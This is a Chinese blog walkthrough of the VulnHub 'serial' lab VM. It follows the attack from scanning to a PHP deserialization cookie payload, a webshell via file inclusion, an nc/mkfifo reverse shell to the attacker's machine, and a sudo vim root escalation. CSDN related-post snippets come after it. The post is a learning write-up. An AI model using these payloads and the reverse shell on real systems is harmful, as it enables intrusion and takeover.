serial靶场

最新推荐文章于 2024-08-13 16:00:16 发布
最新推荐文章于 2024-08-13 16:00:16 发布
阅读量680 收藏 9
点赞数 15
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/140965822
版权

项目地址

https://download.vulnhub.com/serial/serial.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用C段扫描,获取靶机IP地址

arp-scan -l

扫描一下端口

nmap -sV -p- 192.168.48.149

查看一下80端口和22端口

目录扫描一下

dirb http://192.168.48.149

发现这个目录下有文件下载一下

index.php文件中包含user.class.php文件且对cookie中的user参数进行了序列化和base64编码

user.class.php文件包含log.class.php文件且定义了Welcome和User两个类并调用了log.class.php文件中的handler函数

log.class.php定义了Log类和成员变量type_log且handler函数对变量进行了文件包含和输出

没有得到太多有用信息

访问原网站,用Burpsuite抓包查看cookie

由刚才三个文件可知这是base64编码

进行解码

构造payload,尝试读取passwd文件

我这边用了一个小Pwww目录下的1.php(我当时用在线编码不行出不来)

///可以写在任意目录下,要ip+地址/1.php

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

发现除了root还有sk4可以登陆(/bin/basn)

想办法获取shell

在小p下写了一个1.txt木马

将1php内容修改为ip/1.txt

获得编码后的代码

更换抓包后的cooker得到200

输入?cmd=id

在Kali开启一个监听

反弹shell

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.48.130+8888+>/tmp/f

没有反应但是反弹成功了

提权

查看系统版本内核

在根目录发现一个txt.bak文件

查看一下

获得了sk4的登录账号和密码因为之前扫出来有22端口开放

使用远程连接

登陆成功

尝试进入root模式

失败了

试试sudo vim 进入命令模式输入!bash

提权成功

mouyu⇔
关注
网络靶场攻防综合实验
weixin_46605806的博客
12-20 7158
目录一,靶场环境搭建1.1,网络拓扑结构图1.2,搭建简易的网络攻防实验靶场环境,包括:1.3,网络靶场攻击渗透测试,包括:1.4,网络靶场攻击检测二,靶场的搭建与攻击渗透测试2.1,Honeyd2.1.1,honeyd概述2.1.2,honeyd所依赖的函数库2.1.3,搭建honeyd2.1.4,编写honeyd的配置文件2.1.5,启动honeyd2.1.6,检查honeyd搭建情况2.2,具有“永恒之黑”CVE-2020-0796漏洞的虚拟主机2.2.1,漏洞概述2.2.2,复现环境2.2.3,漏洞
day3-java反序列化&php反序列化靶场&之前漏洞复习
m0_70099896的博客
11-22 1012
查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。查看旁站有没有通用性的cms或者其他漏洞,如果存在cms,则可以针对CMS的版本进行相关的漏洞利用。对于一些特殊的网站,还可以尝试社会工程学攻击,比如伪造邮箱链接钓鱼,伪造短信或者电话骗取验证码等等。查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如:ftp,ssh,弱口令等等。如果确实找到了一些安全的问题则向相关的负责人反馈,提出修复的建议。首先获取网站的域名,查看是否有子域名。
反序列化漏洞vulhub靶场serial
yjc1517的博客
07-20 426
夺旗成功
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1426
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
pikachu靶场___反序列化漏洞教程
qq_41584172的博客
12-06 1740
pikachu靶场___反序列化漏洞教程1、靶场环境搭建使用2、基础知识讲解2.1 什么是反序列化2.2 为什么会产生这个漏洞?2.3 漏洞原理分析2.4 漏洞演示 1、靶场环境搭建使用 详见 https://blog.csdn.net/qq_41584172/article/details/103020109 2、基础知识讲解 2.1 什么是反序列化 序列化serialize() 序列化说通俗点...
vulhub-serial-php反序列化靶机实战
飞鱼的企鹅的博客
01-04 2001
前言 此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。 复现过程 环境搭建 靶机下载地址 https://www.vulnhub.com/entry/serial-1,349/ 下载好之后直接用Vmware workstation打开就行了 存活扫描 内网存活主机扫描 arp-scan -l 扫描到的存活主机是192.168.77.157 端口扫描 ...
php反序列靶场serial
weixin_57682301的博客
08-01 904
7.下载bak.zip里面有三个源代码,查看源代码可得知存在文件包含漏洞,可以构造payload加以利用输出一些我们想要的信息。3.使用物理机首先访问80端口,提示这里是新cookie进行程序测试,那我们查看cookie。9.将空格改为\x00,放到burp重放器里面发送。4.f12查看,是一段base64编码。6.进入backup子目录发现有压缩包。到这里思路突然断了,容up主思考一下。8.用base64解码得到字节序列。2.使用kali扫描nat端口。
DC系列靶场---DC 9靶场的渗透测试
zhouA0221的博客
08-13 1280
先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录。这里我们看到一个password文件,打开之后看到好多个秘密,我把密码放到我们的passwd文件中。
DC系列靶场---DC 7靶场的渗透测试
zhouA0221的博客
08-08 1408
通过 Drush,开发者可以在终端中执行常见的 Drupal 操作,如安装、更新、8、邮件通过脚本执行,每15分钟执行一次,把nc的反弹shell写入脚本文件,攻击端侦听,等待目标主机执行脚本。4、通过查看邮件发现使用了drupal中drush程序,这个工具可以更改用户的密码。这个时候要等,因为这个脚本文件是每15分钟执行一次,所以只需要等待就可以。3、在网站中登录发现不行,之前还扫到一个22端口,通过22端口远程登陆上。看到源码中有config的文件,这个肯定是配置文件,可以看一下。
HTB Popcorn[Hack The Box HTB靶场]writeup系列4
重新启程
02-02 4649
本题是retire的第四题Popcorn 目录 0x00 靶机情况 0x01 扫描端口 0x02 web目录文件扫描 0x03 get webshell 0x04 提权 0x00 靶机情况 本题是linux的靶机,整体看起来难度在3-4之间,比之前的题目有了一些难度,不过做过vulnhub的题目之后,linux的题目基本上怎么做都心里有数了。 0x01 扫描端口 先看下端口...
HackTheBox: Arctic靶场
知柯信安
11-27 722
废话不多说直接开始: 第一步是在计算机上运行NMAP: # Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC -p- -oN scan 10.10.10.11 Nmap scan report for 10.10.10.11 Host is up (0.021s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 135/t
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2748
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8553
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全中的系统信息收集与防护机制探讨
11-17
内容概要:本文档深入介绍了网络安全领域中的系统信息收集方法以及常见的保护措施。主要分为三大板块:获取网络和服务信息的方法、克服CDN和WAF等障碍的技术手段。其中包括对服务厂商、网络架构的理解,对于协议应用、内部网络设备的认识,以及面对各种安全措施如CDN服务、负载均衡器、Web应用防火墙时,如何进行有效的信息搜集。同时推荐了多个相关工具如Masscan、Nmap、Wafw00f及Kali自带动态二进制翻译工具。 适合人群:适合从事网络安全工作的专业人士和技术爱好者,特别是对信息安全有浓厚兴趣的学习者。 使用场景及目标:帮助技术人员提升网络安全领域的实战技能,掌握高效的信息收集技巧,了解并能够对抗多种常见的网络防护技术。 其他说明:文中提供了详细的演示案例和实际操作指导,辅以丰富的外部资源链接支持进一步学习。
基于WPF开发的视频播放器
11-17
基于WPF开发的视频播放器,实现视频的手动添加,播放,暂停,停止,音量,播放速度,以及进度显示。主要采用以下技术: 开发技术:WPF,.Net6.0 开发工具:Visual Studio 2022 具体可参考个人CSDN博客。
中国分地区地级市泰尔指数数据集(2000-2019).zip
最新发布
11-17
中国分地区地级市泰尔指数数据集(2000-2019).zip
Pillow_SIMD-6.0.0.post0+avx2-cp35-cp35m-win32.whl.rar
11-17
python whl离线安装包 pip安装失败可以尝试使用whl离线安装包安装 第一步 下载whl文件,注意需要与python版本配套 python版本号、32位64位、arm或amd64均有区别 第二步 使用pip install XXXXX.whl 命令安装,如果whl路径不在cmd窗口当前目录下,需要带上路径 WHL文件是以Wheel格式保存的Python安装包, Wheel是Python发行版的标准内置包格式。 在本质上是一个压缩包,WHL文件中包含了Python安装的py文件和元数据,以及经过编译的pyd文件, 这样就使得它可以在不具备编译环境的条件下,安装适合自己python版本的库文件。 如果要查看WHL文件的内容,可以把.whl后缀名改成.zip,使用解压软件(如WinRAR、WinZIP)解压打开即可查看。 为什么会用到whl文件来安装python库文件呢? 在python的使用过程中,我们免不了要经常通过pip来安装自己所需要的包, 大部分的包基本都能正常安装,但是总会遇到有那么一些包因为各种各样的问题导致安装不了的。 这时我们就可以通过尝试去Python安装包大全中(whl包下载)下载whl包来安装解决问题。
MATLAB-四连杆机构的仿真+项目源码+文档说明
11-17
<项目介绍> - 四连杆机构的仿真 --m3_1.m: 位置问题求解 --m2_1.m: 速度问题求解 --FourLinkSim.slx: Simlink基于加速度方程的仿真 --FourLinkSim2.slx: Simscape简化模型仿真 --FourLinkSim3.slx: Simscape CAD模型仿真 - 不懂运行,下载完可以私聊问,可远程教学 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
pendulum-2.1.2-cp310-cp310-win_amd64.whl.rar
11-17
python whl离线安装包 pip安装失败可以尝试使用whl离线安装包安装 第一步 下载whl文件,注意需要与python版本配套 python版本号、32位64位、arm或amd64均有区别 第二步 使用pip install XXXXX.whl 命令安装,如果whl路径不在cmd窗口当前目录下,需要带上路径 WHL文件是以Wheel格式保存的Python安装包, Wheel是Python发行版的标准内置包格式。 在本质上是一个压缩包,WHL文件中包含了Python安装的py文件和元数据,以及经过编译的pyd文件, 这样就使得它可以在不具备编译环境的条件下,安装适合自己python版本的库文件。 如果要查看WHL文件的内容,可以把.whl后缀名改成.zip,使用解压软件(如WinRAR、WinZIP)解压打开即可查看。 为什么会用到whl文件来安装python库文件呢? 在python的使用过程中,我们免不了要经常通过pip来安装自己所需要的包, 大部分的包基本都能正常安装,但是总会遇到有那么一些包因为各种各样的问题导致安装不了的。 这时我们就可以通过尝试去Python安装包大全中(whl包下载)下载whl包来安装解决问题。
serial.Serial
05-14
serial.Serial是Python标准库中的一个模块,用于通过串口连接进行数据通信。它提供了一系列的方法和属性,可以方便地设置串口参数、打开/关闭串口、发送/接收数据等操作。使用serial.Serial模块,可以实现多种不同类型的串口通信,例如与嵌入式设备、传感器等进行通信。 下面是serial.Serial模块常用的一些方法和属性: - serial.Serial(port, baudrate, bytesize, parity, stopbits, timeout): 构造函数,用于创建一个Serial对象。其中,port参数指定串口号;baudrate参数指定波特率;bytesize参数指定数据位的位数;parity参数指定校验位的类型;stopbits参数指定停止位的位数;timeout参数指定读取数据的超时时间。 - serial.Serial.open(): 打开串口。 - serial.Serial.close(): 关闭串口。 - serial.Serial.write(data): 向串口发送数据。 - serial.Serial.readline(): 从串口读取一行数据。 - serial.Serial.flushInput(): 清空串口接收缓存区。 - serial.Serial.flushOutput(): 清空串口发送缓存区。 如果你还有其他关于serial.Serial模块的问题,欢迎继续提问哦!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值